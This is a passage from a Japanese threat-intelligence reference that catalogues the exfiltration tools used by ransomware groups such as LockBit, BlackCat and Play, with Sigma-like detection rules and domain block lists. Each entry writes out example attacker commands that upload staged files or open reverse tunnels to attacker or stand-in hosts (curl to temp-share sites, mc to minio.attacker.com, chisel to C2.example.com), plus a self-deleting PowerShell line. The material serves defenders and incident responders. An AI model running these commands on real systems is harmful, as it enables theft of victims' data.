• 使用グループ: LockBit3 [19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\data.7z" https://tempsend.com/api/upload

• 検知ポイント: tempsend.com への通信

42. Transfert-my-files

• 種別: ファイル転送サービス
• 使用グループ: LockBit3 [19]
• *コマンド例:

  curl.exe -F "file=@C:\staging\data.7z" https://transfert-my-files.com/upload

• 検知ポイント: transfert-my-files.com への通信

43. ProtonMail (メールベース Exfiltration)

• 種別: セキュアメールサービス経由のデータ持ち出し
• 使用グループ: Avaddon [19]
• *コマンド例:

  # PowerShell で SMTP 送信
  Send-MailMessage -From "compromised@victim.com" -To "attacker@protonmail.com" -Subject "data" -Attachments "C:\staging\creds.7z" -SmtpServer "smtp.victim.com"

  # Python スクリプト（攻撃者がドロップ）
  python.exe send_mail.py --to attacker@protonmail.com --attach C:\staging\dump.rar --smtp relay.victim.com

• 検知ポイント:
  • 非メールクライアントプロセスからの SMTP/HTTPS 送信
  • Send-MailMessage + -Attachments のコマンドライン

---

G. カスタム Exfiltration マルウェア

Sekoia の報告によると、高度なグループほどカスタム持ち出しツールを開発して効率・精度・ステルス性を高める傾向がある [3]。Accenture CIFR は StealBit と ExMatter がRaaSエコシステム全体に拡散し、複数のグループで共有されていると評価 [22]。

44. StealBit

• 種別: LockBit グループ開発のカスタム持ち出しツール
• 使用グループ: LockBit, Dispossessor, DEV-0504 [8][22]
• プロセス名: 不定（ランダム名や正規プロセス偽装）
• 備考: Cybereason は I/O Completion Port モデルによる並列転送の効率性を詳細に分析 [8]。Accenture は新しいサンプルでジオロケーション制限が撤廃された点を報告 [22]。Sekoia は StealBit が LockBit Data Leak Site へ直接送信する独自方式であると説明 [3]。
• *コマンド例 / 動作:

  # ドラッグ＆ドロップまたはコマンドラインでターゲット指定 [8]
  stealbit.exe C:\Users\
  stealbit.exe \\fileserver\shares\Finance\

  # 自動モード（全ドライブスキャン）[8]
  stealbit.exe --auto

  # 内部動作: I/O Completion Port で並列転送 [8]
  # → LockBit Data Leak Site (*.onion) への直接 HTTP POST

• 検知ポイント:
  • 大量ファイルの並列外部転送
  • 不明なバイナリからの大量ファイル読取 + 外部通信（Sysmon EID 1 + EID 3 相関）

45. ExMatter (Exmatter)

• 種別: BlackMatter/BlackCat 関連のカスタム持ち出しツール
• 使用グループ: BlackMatter, BlackCat/ALPHV, Conti [9][22][23]
• プロセス名: 不定（.NET 実行ファイル、Themida 難読化）
• 備考: Kroll は SFTP 優先・WebDav フォールバック構成と自己消去機能を分析 [9]。Accenture は CAD ファイルをターゲットに追加した亜種を報告し、製造業への拡大を指摘 [22]。Symantec は Noberus (BlackCat) 攻撃で Exmatter が使用された事例を確認 [23]。
• *コマンド例 / 動作:

  # ウィンドウ非表示モードで実行 [9]
  sender.exe -nownd

  # 内部動作 [9]:
  # 1. 論理ドライブ列挙 → 除外ディレクトリ (Windows, ProgramFiles 等) をスキップ
  # 2. .pdf, .docx, .xlsx, .pst, .json, .config, .cs, .aspx 等を収集
  # 3. 最近更新されたファイルを優先
  # 4. SFTP (優先) → WebDav (フォールバック) でC2に送信
  #    SFTP: user@185.xx.xx.xx:22
  #    WebDav: https://185.xx.xx.xx/data
  # 5. 自己消去 [9]:
  powershell.exe -c "$f='C:\temp\sender.exe';$s=New-Object IO.FileStream($f,'Open','Write');$s.Write((New-Object byte[] 65536),0,65536);$s.Close();Remove-Item $f"

• 検知ポイント:
  • -nownd 引数を持つ不明な .NET バイナリ [9]
  • 自己消去パターン（PowerShell によるバイナリ先頭上書き+削除）[9]

46. Exbyte

• 種別: BlackByte グループのカスタム持ち出しツール
• 使用グループ: BlackByte [23]
• 備考: Symantec が発見し、収集したファイルを Mega.co.nz API でアップロードする動作を報告 [23]。
• *コマンド例 / 動作:

  # 内部動作 [23]:
  # 1. IsDebuggerPresent でサンドボックス検知
  # 2. ドキュメント系ファイルを列挙・収集
  # 3. Mega.co.nz API でアップロード
  exbyte.exe

• 検知ポイント:
  • 不明な .NET バイナリから mega.co.nz への通信 [23]

47. Ryuk Stealer (Ryuk Infostealer)

• 種別: Ryuk グループのカスタム持ち出しツール
• 使用グループ: Ryuk [22]
• 備考: Accenture は StealBit, ExMatter と並ぶ3大カスタム持ち出しツールの先駆けとして位置付けている [22]。
• *コマンド例 / 動作:

  # 内部動作 [22]:
  # 1. 全ドライブ・ネットワーク共有を走査
  # 2. キーワードフィルタ: "secret", "finance", "confidential", "password", "account"
  # 3. 拡張子フィルタ: .doc, .docx, .xls, .xlsx, .pdf, .csv
  # 4. FTP 経由で攻撃者サーバにアップロード
  ryuk_stealer.exe

• 検知ポイント:
  • 不明バイナリによる大量のファイルアクセス + FTP 通信

48. POWERLIFT

• 種別: カスタム Exfiltration ツール
• 使用グループ: 2023年に不明なランサムウェアアクターが使用 [3][4]
• 備考: Mandiant が 2023年のインシデントで財務・機密情報の持ち出しに使用されたことを報告 [4]。Sekoia もカスタムツールの一例として言及 [3]。
• *コマンド例 / 動作:

  # Mandiant 報告: HTTP POST によるアップロード [4]
  powerlift.exe --target \\fileserver\finance\ --upload https://C2.example.com/collect

• 検知ポイント:
  • 不明バイナリによる財務関連ディレクトリの走査 + HTTP POST

49. GreenCollector

• 種別: Play ランサムウェアのカスタムデータ収集ツール
• 使用グループ: Play [10]
• プロセス名: fs256.exe 等
• 備考: Cato Networks が Play ランサムウェアのインシデント調査で発見し、SMB anomaly として検出可能であることを報告 [10]。
• *コマンド例 / 動作:

  # Cato Networks 観測: 内部共有からステージングサーバへコピー [10]
  fs256.exe \\fileserver\data\ \\staging-server\collect\

  # 内部動作 [10]:
  # SMB 経由で対象共有のファイルを列挙・コピー
  # → ステージング後に Rclone/WinSCP 等で外部転送

• 検知ポイント:
  • SMB anomaly（RoboCopy / GreenCollector による大量コピー）[10]
  • fs256.exe 等の未知プロセスの出現

---

H. トンネリング / プロキシツール（Exfiltration補助）

50. Chisel

• 種別: オープンソースの暗号化トンネルプロキシ
• 使用グループ: 複数グループ [1]
• プロセス名: chisel.exe
• 備考: Symantec はランサムウェア攻撃でトンネルを使った持ち出しインフラとしての悪用を報告 [1]。
• *コマンド例:

  # クライアントモード（被害者端末 → C2 へのリバーストンネル）[1]
  chisel.exe client 185.xx.xx.xx:8443 R:9050:socks
  chisel.exe client --fingerprint XXXX https://C2.example.com R:3389:127.0.0.1:3389

  # サーバモード（攻撃者側）
  chisel server --reverse --port 8443 --socks5

• 検知ポイント:
  • chisel.exe + client / server + R: / --reverse / socks

51. Cloudflared

• 種別: Cloudflare Tunnel クライアント
• 使用グループ: Warlock [19]
• プロセス名: cloudflared.exe
• *コマンド例:

  # クイックトンネル（アカウント不要、即座に外部公開）[19]
  cloudflared.exe tunnel --url http://localhost:8080

  # トークンベースのトンネル
  cloudflared.exe tunnel run --token eyJhIjoi...XXXXX

  # SMB 共有を外部に公開 [19]
  cloudflared.exe tunnel --url smb://localhost:445

  # RDP ポートの公開
  cloudflared.exe tunnel --url rdp://localhost:3389

  # サービスとしてインストール（永続化）
  cloudflared.exe service install eyJhIjoi...XXXXX

• 検知ポイント:
  • cloudflared.exe + tunnel + --url / run / --token
  • *.trycloudflare.com, *.cfargotunnel.com への WebSocket 接続
  • service install によるサービス永続化

52. MinIO

• 種別: S3 互換オブジェクトストレージ / クライアント
• 使用グループ: Warlock [19]
• プロセス名: minio.exe, mc.exe (MinIO Client)
• *コマンド例:

  # MinIO Client（mc）でエイリアス設定 [19]
  mc.exe alias set exfil https://minio.attacker.com ACCESSKEY SECRETKEY

  # ファイルコピー（ローカル → 攻撃者の MinIO サーバ）
  mc.exe cp --recursive C:\staging\ exfil/victim-data/

  # ミラーリング
  mc.exe mirror \\fileserver\shares\ exfil/mirror-data/

  # MinIO サーバの起動（被害者ネットワーク内に立ち上げるケース）
  minio.exe server C:\minio-data --address :9000

• 検知ポイント:
  • mc.exe + alias set / cp / mirror
  • minio.exe + server の起動
  • ポート 9000/9001 への想定外の通信

---

I. クラウドプロバイダ CLI SECTION

53. AWS CLI (aws s3)

• 種別: Amazon Web Services コマンドラインインターフェース
• 使用グループ: 一般 [20]
• プロセス名: aws.exe
• *コマンド例:

  # S3 バケットへのディレクトリ同期 [20]
  aws.exe s3 sync \\fileserver\data\ s3://attacker-bucket/exfil/ --region us-east-1

  # 再帰コピー（ドキュメント系のみ）
  aws.exe s3 cp C:\Users\ s3://bucket/users/ --recursive --exclude "*" --include "*.pdf" --include "*.docx" --include "*.xlsx"

  # 奪取したクレデンシャルの設定
  aws.exe configure set aws_access_key_id AKIAXXXXXXXXXXXXXXXX
  aws.exe configure set aws_secret_access_key XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

• 検知ポイント:
  • aws.exe + s3 sync / s3 cp + --recursive
  • s3.amazonaws.com への大量通信
  • %USERPROFILE%\.aws\credentials ファイルの作成・変更

54. gsutil

• 種別: Google Cloud Storage コマンドラインツール
• 使用グループ: 一般 [20]
• プロセス名: gsutil.exe, gsutil.cmd, python.exe
• *コマンド例:

  # GCS バケットへのコピー [20]
  gsutil cp -r C:\staging\ gs://attacker-bucket/exfil/

  # ディレクトリ同期
  gsutil rsync -r \\fileserver\shares\ gs://exfil-bucket/shares/

  # 並列転送（高速化）
  gsutil -m cp -r C:\Users\admin\Documents\ gs://bucket/docs/

  # 奪取したサービスアカウントキーで認証
  gcloud auth activate-service-account --key-file=C:\temp\stolen-sa-key.json

• 検知ポイント:
  • gsutil + cp / rsync + gs://
  • storage.googleapis.com への大量通信

55. Azure Storage Explorer

• 種別: Azure Blob Storage GUI クライアント
• 使用グループ: BianLian [19]
• プロセス名: StorageExplorer.exe, Microsoft.Azure.StorageExplorer.exe
• *コマンド例:

  # GUI アプリケーション（RDP セッション内で操作）[19]
  StorageExplorer.exe

  # サイレントインストール
  StorageExplorer-windows-x64.exe /S
  # → GUI 上で Blob コンテナへのドラッグ＆ドロップアップロード

• 検知ポイント:
  • StorageExplorer.exe の予期しないインストール・実行
  • *.blob.core.windows.net への想定外の通信

56. S3 Browser

• 種別: Amazon S3 GUI クライアント
• 使用グループ: Yanluowang [19]
• プロセス名: s3browser.exe
• *コマンド例:

  # GUI アプリケーション [19]
  s3browser.exe
  # → GUI 上でアカウント設定（Access Key + Secret Key）+ バケット操作

• 検知ポイント:
  • s3browser.exe の予期しないインストール・実行
  • s3.amazonaws.com への通信

---

J. FTP サーバソフトウェア（攻撃者展開型） SECTION

57. SolarWinds Serv-U FTP

• 種別: FTP/SFTP サーバソフトウェア
• 使用グループ: Clop [19]
• プロセス名: Serv-U.exe, ServUDaemon.exe
• 備考: Clop は CVE-2021-35211 (Serv-U リモートコード実行) を悪用してデータ持ち出しを行った事例がある [19]。攻撃者が被害者環境に新規 Serv-U をインストールするケースと、既存インスタンスの脆弱性を突くケースの2パターンが存在する。
• *コマンド例:

  # サーバのサイレントインストール [19]
  ServU-FTP-Setup.exe /S /D=C:\ProgramData\ServU

  # サービスとして起動
  net start "Serv-U FTP Server"

  # → 攻撃者が外部から FTP/SFTP 接続してファイルを取得
  # CVE-2021-35211 悪用パターン: 既存 Serv-U の脆弱性を突いてRCE → FTP 転送

• 検知ポイント:
  • Serv-U.exe / ServUDaemon.exe の予期しないインストール
  • 新規 FTP/SFTP リスナーの開設（ポート 21/22/990）
  • C:\ProgramData\RhinoSoft\Serv-U\ 配下のファイル作成

---

検知ルール策定ガイド

Sysmon ベースの検知（推奨イベントID）

Sysmon EID	検知対象	説明
EID 1 (Process Create)	プロセス名・コマンドライン引数	上記全ツールのプロセス実行検知
EID 3 (Network Connection)	外向き接続	クラウドストレージ・C2 への通信
EID 11 (File Create)	設定ファイル・バイナリ出現	rclone.conf, WinSCP 設定, .ffs_batch 等
EID 15 (FileCreateStreamHash)	ADS	ダウンロードされたツールの Zone Identifier
EID 22 (DNS Query)	名前解決	MEGA, Dropbox, Azure, AWS, GCP 等

優先度の高い汎用検知ルール例（Sigma-Like 疑似ルール）

# Rule 1: Rclone Execution (including renamed binaries) [1][2][4]
title: Suspicious Rclone-like Activity
detection:
  selection_cmdline:
    CommandLine|contains:
      - 'rclone'
      - '--transfers'
      - '--checkers'
      - '--bwlimit'
      - 'mega:'
      - 'sftp:'
      - 's3:'
      - 'gdrive:'
      - 'dropbox:'
  selection_config:
    TargetFilename|endswith: 'rclone.conf'
  condition: selection_cmdline or selection_config

# Rule 2: AzCopy / Azure Storage Explorer Exfiltration [14][21]
title: Azure Storage Data Exfiltration
detection:
  selection_azcopy:
    CommandLine|contains|all:
      - 'azcopy'
      - 'blob.core.windows.net'
  selection_explorer:
    Image|endswith: 'StorageExplorer.exe'
  filter:
    User|contains: 'svc_azure_backup'
  condition: (selection_azcopy or selection_explorer) and not filter

# Rule 3: Archive Creation with Sensitive Paths [7][12]
title: Suspicious Archive Creation from Network Shares
detection:
  selection_tool:
    Image|endswith:
      - '7z.exe'
      - '7za.exe'
      - '7zG.exe'
      - 'rar.exe'
      - 'WinRAR.exe'
  selection_target:
    CommandLine|contains:
      - '\\\\'
      - '-p'
      - '-hp'
  condition: selection_tool and selection_target

# Rule 4: PSCP / SCP Exfiltration [12][15]
title: SCP-based Data Exfiltration
detection:
  selection:
    Image|endswith:
      - 'pscp.exe'
      - 'scp.exe'
      - 'lsas.exe'
    CommandLine|contains: '@'
  condition: selection

# Rule 5: Upload to Temporary File Sharing Service [2][7][11][19]
title: Upload to Disposable File Sharing Service
detection:
  selection:
    CommandLine|contains:
      - 'temp.sh'
      - 'transfer.sh'
      - 'file.io'
      - 'gofile.io'
      - 'easyupload.io'
      - 'dropmefiles.com'
      - 'qaz.im'
      - 'sendspace.com'
      - 'anonfiles'
      - 'ufile.io'
      - 'bashupload.com'
      - 'tempsend.com'
      - 'transfert-my-files.com'
      - 'dropfiles.com'
      - 'privatlab'
  condition: selection

# Rule 6: cURL / wget File Upload [2][5]
title: cURL or wget File Upload
detection:
  selection_curl:
    Image|endswith: 'curl.exe'
    CommandLine|contains:
      - '--upload-file'
      - '-T '
      - '-X POST'
      - '-F "file='
      - '-F file=@'
      - '--data-binary @'
  selection_wget:
    Image|endswith: 'wget.exe'
    CommandLine|contains: '--post-file'
  condition: selection_curl or selection_wget

# Rule 7: Unauthorized RMM Tool [1][17]
title: Unauthorized Remote Management Tool Execution
detection:
  selection:
    Image|endswith:
      - 'AnyDesk.exe'
      - 'ScreenConnect.ClientService.exe'
      - 'ScreenConnect.WindowsClient.exe'
      - 'AteraAgent.exe'
      - 'ehorus_agent.exe'
      - 'pandora_rc_agent.exe'
  filter:
    # 承認済みRMMを除外（環境に合わせて調整）
  condition: selection and not filter

# Rule 8: Restic / Backblaze Backup to External [7]
title: Backup Tool Used for Exfiltration
detection:
  selection_restic:
    Image|endswith: 'restic.exe'
    CommandLine|contains:
      - 'rest:http'
      - 'rest:https'
      - 'backup'
  selection_b2:
    Image|endswith: 'b2.exe'
    CommandLine|contains: 'sync'
  condition: selection_restic or selection_b2

# Rule 9: Cloudflare Tunnel Creation  [19]
title: Cloudflare Tunnel Creation
detection:
  selection:
    Image|endswith: 'cloudflared.exe'
    CommandLine|contains:
      - 'tunnel'
      - '--url'
      - '--token'
      - 'service install'
  condition: selection

# Rule 10: Cloud Provider CLI Exfiltration  [20]
title: Cloud CLI Data Exfiltration (AWS/GCP)
detection:
  selection_aws:
    Image|endswith: 'aws.exe'
    CommandLine|contains:
      - 's3 sync'
      - 's3 cp'
  selection_gsutil:
    CommandLine|contains:
      - 'gsutil'
      - 'gs://'
  selection_aws_config:
    CommandLine|contains|all:
      - 'aws'
      - 'configure set'
      - 'aws_access_key_id'
  condition: selection_aws or selection_gsutil or selection_aws_config

# Rule 11: MinIO Client Exfiltration  [19]
title: MinIO Client Data Transfer
detection:
  selection:
    Image|endswith: 'mc.exe'
    CommandLine|contains:
      - 'alias set'
      - 'cp --recursive'
      - 'mirror'
  condition: selection

# Rule 12: Email-based Exfiltration  [19]
title: PowerShell Send-MailMessage Exfiltration
detection:
  selection:
    Image|endswith:
      - 'powershell.exe'
      - 'pwsh.exe'
    CommandLine|contains:
      - 'Send-MailMessage'
      - '-Attachments'
  condition: selection

# Rule 13: SolarWinds Serv-U Suspicious Install  [19]
title: Unexpected Serv-U FTP Server Installation
detection:
  selection:
    Image|endswith:
      - 'Serv-U.exe'
      - 'ServUDaemon.exe'
  selection_service:
    CommandLine|contains|all:
      - 'net start'
      - 'Serv-U'
  condition: selection or selection_service

# Rule 14: Sendspace Interaction  [19]
title: Sendspace File Upload
detection:
  selection:
    CommandLine|contains:
      - 'sendspace.com'
      - 'api.sendspace.com'
  condition: selection

ネットワークベースの補助検知

対象ドメイン/URLパターンのアウトバウンド通信を監視：

クラウドストレージ（想定外使用時）: - *.mega.co.nz, g.api.mega.co.nz [4][11] - *.blob.core.windows.net [14] - s3.amazonaws.com, s3.*.amazonaws.com [20] - storage.googleapis.com [20] - *.dropbox.com, content.dropboxapi.com [11] - *.pcloud.com, api.pcloud.com [11]

一時ファイル共有サービス（全てブロック推奨）[11][19]: - temp.sh, transfer.sh, file.io, gofile.io, easyupload.io - qaz.im, dropmefiles.com, dropfiles.com, privatlab.com, privatlab.net - sendspace.com, api.sendspace.com - anonfiles.com, anonfiles.la, anonfiles.* - ufile.io, bashupload.com, tempsend.com, transfert-my-files.com

RMM / リモートアクセス（未承認時）[1]: - *.net.anydesk.com - *.screenconnect.com, *.connectwise.com - *.atera.com

トンネリング / インフラ [19]: - *.trycloudflare.com, *.cfargotunnel.com - MinIO 関連: ポート 9000/9001 への想定外の通信

メールベース [19]: - mail.protonmail.com への非メールクライアントからの大量通信

---

参考文献

[1] Symantec / Broadcom — "Data Exfiltration: Increasing Number of Tools Leveraged by Ransomware Attackers"
https://www.security.com/threat-intelligence/ransomware-data-exfiltration

[2] ReliaQuest — "Exfiltration Tools: How Cybercriminals Make Off with Your Data"
https://reliaquest.com/blog/exfiltration-tools/

[3] Sekoia — "Ransomware-driven data exfiltration: techniques and implications" (2025/03)
https://blog.sekoia.io/ransomware-driven-data-exfiltration-techniques-and-implications/

[4] Mandiant / Google Cloud — "Ransomware Rebounds: Extortion Threat Surges in 2023"
https://cloud.google.com/blog/topics/threat-intelligence/ransomware-attacks-surge-rely-on-public-legitimate-tools

[5] Infosecurity Magazine — "Threat Actors Favor Rclone, WinSCP and cURL as Data Exfiltration Tools"
https://www.infosecurity-magazine.com/news/rclone-winscp-curl-top-data/

[6] Synacktiv — "Legitimate exfiltration tools: summary and detection for incident response"
https://www.synacktiv.com/en/publications/legitimate-exfiltration-tools-summary-and-detection-for-incident-response-and-threat

[7] Huntress — "Exposing Data Exfiltration: Detecting LOLBins, TTPs, and Ransomware Tactics"
https://www.huntress.com/blog/exposing-data-exfiltration-lolbin-ttp-binaries

[8] Cybereason — "THREAT ANALYSIS REPORT: Inside the LockBit Arsenal — The StealBit Exfiltration Tool"
https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-lockbit-arsenal-the-stealbit-exfiltration-tool

[9] Kroll — "Analyzing Exmatter: A Ransomware Data Exfiltration Tool"
https://www.kroll.com/en/publications/cyber/analyzing-exmatter-ransomware-data-exfiltration-tool

[10] Cato Networks — "Sophisticated Data Exfiltration Tools Used in Double Extortion Ransomware Attacks"
https://www.catonetworks.com/blog/sophisticated-data-exfiltration-tools-used-in-double-extortion-ransomware-attacks/

[11] BushidoUK — Ransomware Tool Matrix (GitHub)
https://github.com/BushidoUK/Ransomware-Tool-Matrix/blob/main/Tools/Exfiltration.md

[12] Microsoft Security Blog — "Defenders beware: A case for post-ransomware investigations"
https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/

[13] The DFIR Report — "Cobalt Strike and a Pair of SOCKS Lead to LockBit Ransomware"
https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/

[14] Cyber Security News — "Trusted Azure Utility AzCopy Turned into Data Exfiltration Tool" (2026/03)
https://cybersecuritynews.com/trusted-azure-utility-azcopy-turned/

[15] BleepingComputer — "BlackCat ransomware pushes Cobalt Strike via WinSCP search ads"
https://www.bleepingcomputer.com/news/security/blackcat-ransomware-pushes-cobalt-strike-via-winscp-search-ads/

[16] CISA — "#StopRansomware: Akira Ransomware"
https://www.ic3.gov/CSA/2024/240418.pdf

[17] Morphisec — "Ransomware Evolution and Data Exfiltration"
https://www.morphisec.com/blog/ransomware-evolution-and-data-exfiltration-a-deep-dive-for-cybersecurity-analysts/

[18] Trend Micro — "The State of Ransomware: 2020's Catch-22"
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/the-state-of-ransomware-2020-s-catch-22

[19] ransomware.live
https://www.ransomware.live/

[20] Vectra AI — "Detecting Cloud-Based Data Exfiltration"
https://www.vectra.ai/

[21] Varonis — "AzCopy Abuse in Ransomware Campaigns"
https://www.varonis.com/blog

[22] Accenture CIFR — "Analysis of Exfil Tools StealBit and ExMatter"
https://www.accenture.com/us-en/blogs/security/stealbit-exmatter-exfiltration-tool-analysis

[23] Symantec — "Exbyte: BlackByte Ransomware Attackers Deploy New Exfiltration Tool"
https://www.security.com/threat-intelligence/blackbyte-exbyte-ransomware